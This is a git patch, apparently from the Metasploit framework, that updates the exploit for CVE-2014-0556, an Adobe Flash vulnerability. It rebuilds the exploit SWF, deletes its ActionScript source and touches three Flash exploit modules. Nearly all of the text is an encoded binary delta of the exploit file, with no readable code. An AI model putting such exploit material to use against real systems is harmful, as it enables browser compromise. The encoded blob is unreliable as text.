From 02181addc5e4cdb143d08591be9f5710dfdb435d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 4 Jun 2015 18:23:50 -0500 Subject: [PATCH] Update CVE-2014-0556 --- data/exploits/CVE-2014-0556/msf.swf | Bin 17720 -> 20719 bytes .../source/exploits/CVE-2014-0556/Main.as | 185 ------------------ .../adobe_flash_net_connection_confusion.rb | 2 +- .../adobe_flash_uncompress_zlib_uaf.rb | 2 +- .../adobe_flash_copy_pixels_to_byte_array.rb | 21 +- 5 files changed, 14 insertions(+), 196 deletions(-) mode change 100755 => 100644 data/exploits/CVE-2014-0556/msf.swf delete mode 100755 external/source/exploits/CVE-2014-0556/Main.as diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf old mode 100755 new mode 100644 index f6483bd08741f6e2d275d8e95e7cce77be244500..3cf2bc3d4f3050303018392bb865b230ac076125 GIT binary patch delta 20599 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ξt1)Xs3-wFrx1O!PWFM`GB+qtW&Wp<-lBSn-GH+%kWQ z;tw6In12DfFJ;sCE~`E%{7PUDfEwk&WsMtp5f|?*%1X^J6=%xgob&Zp0(7l4t9@J2 zT$U-tFK~n2!Zi8SOA*sf#N;PeI7iMWi3d-W9JMYWb)d{qpt~RMzUai~`}-@7(c{Hy z;&EFY;0Tx+yY?dxy!~BNk!g1*YaVQJP--i`aepJ7MusA|9)n}xEee>6)Gt%$Kyo7K zk9z#L?!M_LuzVu>OBiGG)zDW` zQkcp2C$T{s`oPB6GNE{(&a6a@h3l!S!#rx8QKjyPdKBidKI^wZk|5I{4x)dCofDva z4}ZF9>~vBZNS}Cce!zg-VIyR|@m&>hxJ>27$ojB~2HLgUD%=m#GWa`$N9hdvKh^=P zEe}OU87g1}3=~R+;V+xYCBE}KN)?o|4daM0nF9CVT^kHLwYL7?GlxBGDRNTeQQg2N zTpU7@khUH^eBR^)ij4hi^?WB2RkU_Rjend4X_JqA#n$3%wvN?c$aboI(n&s@?o^a7 z8xfx(DN*`UEP^ADn`pDS0S+-9%MEH02wCk-gIVsk{wG$kPbrj!8Nxd}DF9ix@rH~h znS2ix+4@sfgb0Dihgg$-l^c2>b(uR|)M+^wV3n9ZbXpbkio#XA{hiCv>cf1y?78!iHf1<`$wrs z9{U?4&403`=*i{1d>Hc>kV*yRC#{y83r{1S3-XMqfe1BxL%|-(8P8q~!Ch0l8;}>| z9^*C^j@Fo6iuzpE5G^fiolI^Afqz0j|NeK|nUhT8H1xx)ayj|msvXrsg4x*=AK{X3+k z$j~od(C`IXmy4iY<~x|!g)HXy-5|DXQ#~hcmj@xSL(gMM@C0+~H0|PS&~z$m=kku$ zKReO%YeB!wya-0e1Cc8qJ)78lf{e7KLR2?)}03M@54@K0m#-oLjJIXg_23U zsPYt6gwF7k!Pu&F_IRI)cb{BIMH-PrX0O2M+`?K*7+V&xPJ8*!QXzz+Cs?qtXSU57iZq z@qbA9ExmYOXxA2m%n_L3K?zt?zQIvyA_O$lD4hq1e1G21*FBd3kBJ!)TmA9RYP*4s zZE|6${gqav#2L>=ALIeT*2L$fx}m?AZ%auh9==SS z{W_9~$%3X}dcomcFcuEd$uoca&NcUyzcoAoxx9?b8%YOa8~;j5W{i5IyS{uiU{n}2 zODC3>a(@iJ_z zD8YRJEcP5jg8+ImIr4qC6)(5%9`@GCUkVqoe`Z)bW7_)wMnxU_ WNF@!ul#mtt0sdjH8u@kiSh>QMST&oY8?Wv!@zQ@ODQby`G+D$)gYeK@r=sRh=ZhmT6 z-ZU@Vf@MHv-&5tJ*XJT0EnCscxc!RUW;sLxxgw+~YgbM+7jR@1%J!ST1ynLtz(ecb^!;ST`yr=H76Ea1M??si zFTI)SY-cb8A0ib*IdgP@pBDZO7RN1C4?V zkJl65(ahjeV#48X)|}3oQpX 